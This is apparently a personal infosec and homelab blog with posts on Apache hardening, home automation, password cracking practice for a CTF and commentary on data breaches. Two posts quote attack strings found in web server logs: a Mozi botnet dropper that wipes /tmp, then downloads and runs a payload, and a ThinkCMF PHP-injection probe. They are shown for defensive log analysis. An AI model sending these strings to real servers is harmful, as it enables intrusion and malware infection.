The Blog Pages

rsync'd every darn day.

They were POSTing all along. Rookie mistake.

    A family-friend-client tasked me with the purpose of figuring out why their, self-hosted, web server was receiving so much traffic but their product statistics, customer feeback, and lack of business leads did not reflect an uptick in traffic. IF more people are visiting than normal then sales SHOULD be up right? Typically. Unless it is being used for something 'else'. Next step: view the logs!.

    As I assumed the server was being used as a relay for posting of screen captures. Malicous or not.. the traffic isn't related nor wanted. Guess what ip address shows up in the log for the POST request FROM his server? Yeah, no bueno!

    Apache is not very secure by default. It needs to be hardened. I simply enabled the rewrite module and appended some Rewrite Rules to the htaccess file. Bam!

    sudo a2enmod rewrite Enable module

    sudo systemctl restart apache2 Restart Apache to load Rewrite module

            RewriteCond %{REQUEST_METHOD} POST
            RewriteRule .* - [F,L]

    In addition to the above I did advise 'Mike' that the logs would have to be monitored and rewrite rules modified, semi-continuously, to remove ALL unwanted traffic. "Businesses do not have IT departments only for when poo hits the fan. They are also there so the smell doesn't even reach the office."

  • A. Buford
  • Oct, 18th 2021

What's your problem, do you like even blog... bro

    What happened was..

    To be honest I have been keeping pretty busy with the NCL, work, $ and family. I'm completely happy with that setup.

  • A. Buford
  • Oct, 11th 2021

Crowdstrike Cyber Challenge+

Crowdstrike Cyber Challenge

    I completely forgot I have this one coming up. It will be a lunch time type deal. This week is a busy one. Fun fact: My son is learning to code in school and he loves it. Go figure. 🤴

    This weekend is the self imposed electronics cleaning and maintenance window for things-at-home.

  • A. Buford
  • Oct, 2nd 2021

NCL Class is.... just wow.

Hashcatn it

    So far we have had SMEs come in and breakdown the usage of various applications and methodologies in the field of information security including, but not limited to, Burp, JTR and hashcat. I also learned that i'm not completely crazy. Psychology = penetration testing and JTR is a PITA to compile with Nvidia cuda support. Post class I was able to capture a couple more CTF flags based on what I learned and/or reinforced in a few hours. #Winning

    Special thank you(s) to; Johnny Xmas, Mishaal khan, and Matt Wagenknecht.

  • A. Buford
  • Oct, 1st 2021

What's crack'n?

    Not much going on but work-work and NCL self-study. I'm still undecided on which cert to attack next. CompTia, this year alone, has set me back $1,000 that i'm not getting back! It is what it is.

  • A. Buford
  • Sept, 28th 2021 | Home Automation pt.VI

    I'm still adjusting the Lovelace dashboards to what makes the most sense. I'm leaning towards having a dedicated media 'manager' page.

  • A. Buford
  • Sept, 25th 2021 | Home Automation pt.V

    I was finally able to understand enough to install the Community Store and get it all configured. The layouts possibilities are now endless. I decided to add a BRG coinbase wallet card just because. Currently the HA frontend is running a transparent custom theme available in the HACS. The YAML coding is fairly straight forward although I did have hiccups with duplicated parameters.

    I finally got to do something that I never did with KVM/QEMU. I resized a vm by +30GB. I never really had a reason to until now. It was extremely easy with virsh.

    virsh domblklist : Get directory information for vm instance

    qemu-img resize /var/lib/libvirt/images/speedyvm/haos_ova-6.2.qcow2 +20G : Resize vm

    fdisk -l /var/lib/libvirt/images/speedyvm/haos_ova-6.2.qcow2 : Verify resize (will require vm restart).

  • A. Buford
  • Sept, 22nd 2021 | Home Automation pt.IV

    So far so good with I have been able to configure most sensors and output devices with Lovelace cards. The platform is extremely flexible and extensible. It has only been a few days and I am already amazed by the benefits of, locallay hosted, home automation. The light in the kids room closet is no longer 'left' on and i'm MUCH closer to single pages for related tasks including, but not limited to, system administration.

    NCL Update: I'm not really allowed to post much pre and post competition. Any updates regarding the NCL will be intentionally vague

  • A. Buford
  • Sept, 20th 2021

Just sleep on it

    Have you ever gone to bed with a super-difficult-question in your head?

    Well, I have. Lately I have been waking up with either answers or a brand new way of thought. Is it possible to learn in a person's sleep? It is seriously starting to freak me out. I have said for years, to those close to me, "the futher I dig into infosec the more I make connections with psychology". I think this is another case of that.

    The world of information technology is full of alerts, notifications, and patterns. Sometimes our brains cannot process every 'sensor' or 'input' in real time. Our 'memory' [literally] becomes full and artifacts are placed into a 'swap file' that our subconcious is processing 24/7. Our subconscious has the opportunity to process that information when the amount higher-level-tasks is least. At rest.

    In the morning, having “slept on” their remaining brainteasers, the refreshed participants were able to work through more of them. They were able to solve 31.7% of the puzzles invoked by sounds during sleep — a 55% improvement over the 20.5% of uncued puzzles that they could solve.

    When individuals have brain computation, object orientation, or pattern recognition errors they tend to 'crash' or 'panic' without an appropriate shim [object] or patch [medication].

    Our brain, our computer, isn't much different than an operating system [imo]. Then again, this whole rant could also be a result of a bad sleep pattern. I'm no psychologist.

  • A. Buford
  • Sept, 20th 2021

Sec+ & Net+ Renewal complete! & NCL update.

    Earlier today I renewed BOTH my CompTia Network+ and Security+ certifications. It was VERY exhausting. I had to re-learn, a lot, in order to pass through. Extremely happy it is done. I won't have to worry about them again until 2024.

    Tonight Mission: Crack these passwords for competition practice.

    fun nights

    9-18-2021 | I woke up to good news!

    fun nights

  • A. Buford
  • Sept, 17th 2021

NCL update.

NCL Fall 2021

    Tonight Mission: I really need to deep dive into Python again with a focus on remembering functions. I'll start with "Learn Python - Full Course for Beginners [Tutorial]" @ I've watched this video almost 4 times over the last 3 years and am always taking away something new.

    Oh yeah.... I took time off, officially for competition, with the hopes of doing better than I ever have in a CTF

    LEt's go!

    Make the most of your time by being comfortable where you work and learn. Stay ready!
    stay ready!

  • A. Buford
  • Sept, 15th 2021

Microsoft-Linux's secret agent person

    Remeber that one time you had to update something you didn't know you installed or asked for? I do, Sony BMG is no longer around though. Microsoft is.

    When customers set up a Linux virtual machine in their cloud (AZURE), the OMI agent is automatically deployed without their knowledge when they enable certain Azure services. Unless a patch is applied, attackers can easily exploit these four vulnerabilities to escalate to root privileges and remotely execute malicious code (for instance, encrypting files for ransom).

    Why is the OMI agent of concern you ask, right?

    ..Thanks to the combination of a simple conditional statement coding mistake and an uninitialized auth struct, any request without an Authorization header has its privileges default to uid=0, gid=0, which is root.

    TDLR; Easy to gain root locally. Remote takeover possible in some default instances.

    What is important about all this?! A few LARGE cloud service providers automatically install 'secret' agents on VM instances. Customers need to understand that Cloud computing comes with things you don't want OR ask for sometimes.

  • A. Buford
  • Sept, 15th 2021

All(most) done w/ home automation!

all ziggd up

    I finally was able to get the zigbee2MQTT firmware correctly flashed on the c2531 and running on Home Assistant. I had to give up on Domonticz. Too much play. Not much fun. At the moment at a least.

    It feels so great to be able to control my system without the need for the Samsung Smartthings hub and/or a working internet connection. I have approximately 20% of the system connected. Configuration is the hard part. The goal is to integrate network AND home security with presense.This will be 'epic!'..... and save on the electric bill. I hope.

    all ziggd up

    Now to the next rabbit hole. Learning the serialization language that is YAML to make it all work together more efficiently. It doesn't look too far off from, or any more complicated than, XML and JSON. I use both almost everyday for 'paid labor' on the Salesforce platform. Small world.

      - host: IP_ADDRESS_CAMERA_1
        username: YOUR_USERNAME
        password: YOUR_PASSWORD

    Resources | &&

    Unrelated news. Thank you mom for the car help!

    We will never forget. 9/11

  • A. Buford
  • Sept, 11th 2021

NCL Fall 2021

    I am extremely happy to share that I will be participating in the Fall 2021 National Cyber League CTF. It allows for the opportunity to sharpen up on some technical pentesting and vulnerability research skills I have acquired over the years, that I had put on the back burner, while sharing my experiences with a TEAM of like minded individuals.

    I will post progress, when possible, when allowed by competition rules.

  • A. Buford
  • Sept, 8th 2021

Chicago CyberSecurity Summit 2021


    The Chicago Cybersecurity Summit this year was somewhat informative. Many of the items spoke on related to Covid's impact on security. The most notable was how rapid adoption and integration of technologies left many gaps for attackers to try to fill.

    Employees and employers had to get familiar, too late, with virtual private networking, cloud methodologies, and the basic idea of 'remote desktops' to name a few.

    As with most bad news.. attackers jump faster than most involved in the patching processes of small to medium sized businesses. Enterprise networks are no exception though.

    A lot was learned. I will attend again next year. I tell those who inquire. Use PTO to grow yourself mentally, spiritually, and/or physically via learning and have fun while doing so. Spending time with family IS growth.

  • A. Buford
  • Sept, 7th 2021

Home automation via crontab and scripts (pt.iii)

home automations

    My finance surprised me by purchasing the debugger. My happiness was quickly replaced by anxiety when I ohmed out the bridgeboard. Shorted across two pins and a 3rd pin completely open. Sent out for replacement. Update soon.

  • A. Buford
  • Aug 24th-earrrly AM, 2021

More on 'Bolt'... my new work server

Bolt john-the-ripper

    I went ahead and installed John The Ripper on the server using snap. It is a lot easier than I used to remember. When I first used JTR, some 7+ years ago, it has to be complied to allow for gpu support.


    Originally, “Cracker Jack” was developed for the sake of cracking Unix /etc/passwd files with the help of a dictionary. Then, John the Ripper came into existence afterward. Moreover, a “Pro” version was developed to include more features than the ordinary version. Especially that it has the capability to include and deal with many more hash types on which encrypted passwords are based in the first place. The Rapper’s commercial version is the most used among penetration testers for cracking passwords. This is essentially because of both its speed and great performance.

    $ sudo snap install john-the-ripper

    I periodically use JTR for infosec research. I was not expecting to return anything special when I bechmarked..

    ltd..and I didn't. So it appears you still have to build yourself for gpu support. I'll revisit after Samba configuration is perfected.

    Bolt john-the-ripperMore info @

  • A. Buford
  • Sept 1st, 2021

Finished up 'Bolt' my new work server


    Bolt is pretty much the internals from 'ShadowMoon' + 250gb nvme + 500gb ssd + alt 800W power supply. I always say. "Don't throw away old tech". Old doesn't mean useless and chances are good you can de-solder some parts for reuse / inventing.

    .... and that's all folks. I'm tired. The plan is to configure Samba server tomorrow... hopefully.

  • A. Buford
  • Sept 1st, 2021

Shadowmoon has Ryzen

Shadowmoon Ryzen

    Recently my AMD FX black cpu wasn't cutting it for Plex and other home LAN services. I was finally able to 'upgrade'. The best part is the fact that the liquid cooler from the FX series bolts right up to a AM4 chipset. I researched this build for approximately 1 month in advance.

    After a hour of fidd'lin around I was able to dial in my overclock to maximize the memory speed. For some reason when I build a pc, 7/10 times, a monitor ends up on the floor 'test bench'.

    Shadowmoon Ryzen

    Room temperatures are noticibly lower considering not much was swapped (cpu,mobo,ram).

    Shadowmoon Ryzen

    I'm extremely grateful to be able to continue learning through personal experience. Financially and physically.

    Shadowmoon Ryzen

    ltdOkay, so I couldn't just let this 8 core cpu and motherboard just sit on the shelf. I, for the most part, finished assembling the box. I was able to use the Ryzen AM4 stock cooler from the Ryzen 5 on the FX8. I am going to use this as my 'web dev' env server and VM playground host.

    Shadowmoon Ryzen

  • A. Buford
  • Sept 1st, 2021

Server air movement meets 3d Printing

3d print fan mount

    It was getting a little hot behind the 4U so I decided to repurpose a couple of 120mm pc fans. The 'mini' Thermalake fan wasn't cutting it. I 3d printed some modified 120mm fan mounts to take care of the job. Total print time was approximately 4 hours on the Crealty Ender 3 Pro. The printer actually sits one shelf above the server AND is controlled via a Pronterface enabled VM. USB passthrough is enabled with a physical cord for comm. Win-Win.

    The bed leveling system took care of the most frowned upon part, leveling. Temps are way down and hot air is no longer getting trapped between the UPS and rackmount. Sticker safe temperatures

    I like stickers, a lot.

    sticker laptops

    Original Thingiverse thing:

  • A. Buford
  • Aug 31st, 2021

Home automation via crontab and scripts (pt.ii)

home automations usb

    So far it seems like I will be using the CC2531 usb dongle as the zigbee coordinator after flashing with appropriate firmware. Haven't decided on if I will go with the usb debugger route or gpio path for programming with a RaspberryPi W. I want to learn how it is done before buying pre-built stuffs.

    As always, support Open-source software by donating to the organizations you back.

  • A. Buford
  • Aug 30th, 2021

"Rsyslog meets unused ssd

syslog config

    For a while now I have been wanting to implement a unified/central logging 'center'/server to correlate activities, including attempted access violations, on the SOHO LAN. The time for action was yesterday

    The process was extremely straight forward. Install apt-get install rsyslog -y

    Update server configuration to allow remote client access via UDP and TCP.

    syslog config

    Update client configuration to send logs. Open client config; sudo nano /etc/rsyslog.conf. Append to eof *.* @@ Make sure to update IP address to that of syslog server.

    Restart rsyslog service on server then client. sudo systemctl restart rsyslog

    Verify server configuration accepted and service is running. systemctl status rsyslog. Green means go 👍

    syslog config

  • A. Buford
  • Aug 28th, 2021 👍

"It wasn't us, it was the config I tell you!

Growth with Greg PT

    For months, Microsoft’s Power Apps portals exposed personal data tied to 38 million records ranging from COVID-19 vaccination status, Social Security numbers and email addresses. Consumers most affected by what is being called a “platform issue” are those doing business with American Airlines, Ford, the Indiana Department of Health and New York City public schools.

    Go there to read about the exposed data specifically. So, here is where the hairs on my arm stand up... when I was getting certified on the Power Platform I saw a security vuln, by design, with the idea of easily identifiable / traversable urls linking to important datasets AND lists.


    Power Apps Portals lists are created to display data from tables. These tables are stored within Microsoft Dataverse. When a developer enables the OData feed on the “OData Feed” list settings tab, they must also activate the “Enable Table Permissions” option on the “General” list settings tab unless they wish to make the OData feed public. This is due to all lists having table permissions disabled by default. Table permissions by default will in fact prevent anonymous data access, but lists ignore these permissions and any custom table permissions unless the developer activates table permissions for the list.

    TDLR; If you create a list and enable Open Data (OData) you must Enable table permissions also otherwise data is public. Because lists act different.

    Microsoft has since made changes to Power Apps portals such that table permissions are enabled by default. This report documents the steps that led to that change.

    Usually when I set a platform-wide setting I expect all embedded applications to behave accordingly. If the application isn't working as the platform instructs then it is a 'bug' and therefore a vulnerability. Just saying.

  • A. Buford
  • Aug 25th AM, 2021

Growth with Greg PT

    Now Live!Yes. You heard right. / is up and running. I'm not sure if a more healthy relationship could exist between an IT professional who sits down all day and a Licensed... certified... personal trainer. That health-to-IT profession balance is important. Mobility is key to health.... and i'll stop there. Visit the website. Get trained! Get healthy! Stay smart!

    Growth with Greg PT

  • A. Buford
  • Aug 25th AM, 2021

Home automation via crontab and scripts (pt.i)

home automations

    When I last was messing around with the Smartthings hub and automation I pretty much stopped once I verified it was working. Slowly, but surely, I will now begin to migrate the Samsung hub automations over to various scripts running on the raspberry pi, which runs smartthings-cli. Crontabs will handle the daily, non-triggered-routine, type automations. For the sensor activated 'things' I will start to look into how I may utilize Zigbee directly with the Pi.


    that link brought me to Domoticz @ A clean, open source, all-in-one zigbee controller interface

    Installed via one-liner curl -sSL | sudo bash one pre-reqs, including broker are installed

    sudo apt install -y mosquitto mosquitto-clients

    sudo systemctl enable mosquitto.service

    Note: sometimes the command mosquitto -v prompts a warning message saying “Error: Address already in use“. That warning message means that your Mosquitto Broker is already running, so don’t worry about that.
    home automations

    So far research has lead me to this post. I shall continue when time allows and a zigbee dongle is found. This one seems promising and is preconfigured with Zigbee2Mqtt for $22(ish) [].

    As always, support Open-source software by donating to the organizations you back.

  • A. Buford
  • Aug 24th-earrrly AM, 2021

That one UPS I was talking about

battery box

    I upgraded it. Decided to take out the OE 5ah 12v SLA batteries (2x) and replace them with 35ah units from Amazon. I had to route the wiring externally to accomodate. They now sit in a separate battery box. Now my backup UPS is able to last as long as what most mid size business would need. We own 4 in total, Failure is not an option.

    Btw, do you like the Marvel/D.C. 4u server decor?

  • A. Buford
  • Aug 22nd, 2021

Interesting one liner found in Apache logs.

one liner

    GET /shell?cd+/tmp;rm+-rf+*;wget+;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

    Take a guess as to what they were trying to achieve line-by-line. It helps to understand the level of sophistication of your adversary. Does the attack fit the system of interest? If not, are they possibly just spraying to see what sticks. If so, where can you cut off the attackers next move?

  • A. Buford
  • Aug 22nd, 2021

I don't have time for _____ certification

    Is not what I said when I was working two jobs (2hr commute), attending cyber security bootcamp while obtaining my Network+_ & Security+ certifications

  • A. Buford
  • Aug 22nd, 2021

What more do you want PLEX?!

    The home Plex server, ShadowMoon, is too dated. It will need an upgrade. Thinking of a cheap Ryzen build. I'll keep thinking until Christmas

  • A. Buford
  • Aug 21st, 2021

"Hackers steal nearly $100m in Japan crypto heist"

    "We are sorry to announce that #LiquidGlobal warm wallets were compromised, we are moving assets into the cold wallet," -Liquid

    I have always said, and will continue to say, "IF you are not trading your crypto then put it on a wallet -- on a vm -- on a hdd w sdd copy-- in a safe". It may seem like a little overkill but the threat landscape is THAT SERIOUS now.

    Liquid has said that it was tracing the movement of the stolen cryptocurrencies and working with other exchanges to freeze and recover the assets.

    They will recover a good amount of it, in some type of joint task force venture, to send a political message to hackers or the hackers will return the stolen ear-marked crypto.

    Oh yea.. put into cryptocurrency, or any 'gamble', only what you can afford to loose 100% of. Take care of responsibilities and health first. "Live within your means." Don't keep up with the Jones's if your last name isn't Jones

  • A. Buford
  • Aug 20th, 2021


T-Mobile breach

    I was wrong. I admit it. I was wrong

    The breach was only 40 million and not all of them were T-Mobile customers. Some were prospective clients. Better yet. Some of the stolen pii belonged to people denied credit with T-Mobile!

    T-Mobile breach

    Our preliminary analysis is that approximately 7.8 million current T-Mobile postpaid customer accounts’ information appears to be contained in the stolen files, as well as just over 40 million records of former or prospective customers who had previously applied for credit with T-Mobile. Importantly, no phone numbers, account numbers, PINs, passwords, or financial information were compromised in any of these files of customers or prospective customers.

    I was wrong again! They didn't offer people free LifeLock

    Immediately offering 2 years of free identity protection services with McAfee’s ID Theft Protection Service.

    It was McAfee ID protection. It does feel a little odd that they still use John's name on new products.

  • A. Buford
  • Aug 18th, 2021

T-Mobile databreach of possibly 100M+ customers

T-Mobile breach

    T-Mobile said in a statement to Motherboard that "We are aware of claims made in an underground forum and have been actively investigating their validity. We do not have any additional information to share at this time."

    The most interesting part of this whole situation is that T-Mobile has breaches OFTEN. Customers are seldom compensated or given a fair opportunity to protect their identity.

    It's almost as if a company could share information with other interested parties via a hack and not be penalized as harshly when compared intentional data 'sharing'. Security posture post breach is only monitored internally by any organization. There is no external oversight (in the US). I really wonder what would happen if compromised data was being used by competitor companies for a market advantage. I'm talking embedded in algos, functions, etc. The insurance industry and premiums for example.

    TLDR[vice]; Information includes dob, address information, license numbers, IMEI info++.

    In T-Mobile's defense....they are a really big company and cannot be expected to protect private information forever. Right? I'm sure "One free year of LifeLock" is coming soon.

  • A. Buford
  • Aug 15th, 2021

Review your logs daily! Because proxies, flooding, ++

proxy abuse

    One of the most important resources for artifacts, when not deleted, are logs. Logs are there for a reason and that reason isn't to take up drive space. I review many logs daily. After a while the brain starts to notice irregularities and trends naturally. The brain, IMO, is strongest when tasked with pattern recognition.

    In the above example each 'section' in itself doesn't really provide a lot of information. Let's review the IP addresses. Aside from being on the same network as we don't know much about the traffic with only the IP. However, when the IP addresses are compared to request time we start to see a trend. "Oh wow. Four different addresses tried to access SOMETHING at the same exact time". That is a little odd.

    Let's add the 3rd question of 'what resource was attempted to be accessed?".

    "Oh wow. Four different computers tried to access THE SAME resource at the same exact time. A document that doesn't exist"

    A quick google auto-complete comparison of the keyword "fcked" automatically generated results in-line with my initial assessment of the users goals. Malicious.

    proxy abuse

    If the resource did exist and the objective of the attacker was resource exhaustion then may had succeeded if the only defense was rate-limiting. However they were looking to exploit at a different vector.

    TDLR: check logs for activity frequently and question irregularities.

  • A. Buford
  • Aug 12th, 2021

Stop the hack before you see it evolve


    John Oliver had a show regarding OxyContin and how it caused many unfortunate events. Many people fall victim to big pharma just like many people fall victim to simple malicious cyber attack vectors when the intent, of the topic, is positive or pro-active. Vectors include the malicious registration of similar web domains for nafarious purposes AND low-hanging-fruit attacks (skid spraying).

    Cybersquatting (also known as domain squatting), according to the United States federal law known as the Anticybersquatting Consumer Protection Act, is registering, trafficking in, or using an Internet domain name with bad faith intent to profit from the goodwill of a trademark belonging to someone else. The cybersquatter then offers to sell the domain to the person or company who owns a trademark contained within the name at an inflated price.{wiki}

    On the show John (we go by first names now) revealed that he/they/them (his people's people) registered the domain name in an effort to provide premier resources for information on the Sacklet family and the Purdue Pharma bankruptcy.

    Immediately I saw some possibilities for exploitation.

    Domain registration tips:
    -Buy the singular and plural forms
    -Buy common spelling errors associated with it
    -When possible; buy the .com FIRST
    -Buy any OTHER top level domains
    -Secure DNS

    As a good faith effort and to further information security research best practices we have registered and have awknowledged the registration similarities, via text at top of page, while still allowing direct access to intended website via hyperlinks.

    What have we learned
    -In a single day thousands of vistors have ACCIDENTALY come across our mirrored content
    -We have reinforced our knowledge that some people don't hear the "s" in a .com address.
    -Script kiddies still exist and love to target wordpress website

    "GET /?a=fetch&content={php}die(@md5(HelloThinkCMF)){/php}"

    The website does run on wordpress. Fortunately it is up to date. Go webadmin! Our adventure stops here.

    Not. Even the bad actors mess up with their tools and attack the wrong targets.


    "We are not running Wordpress so 404 your way somewhere else."

    Depending on how advanced these requests get we may opt to honeypot traffic.

  • A. Buford
  • Aug 10th, 2021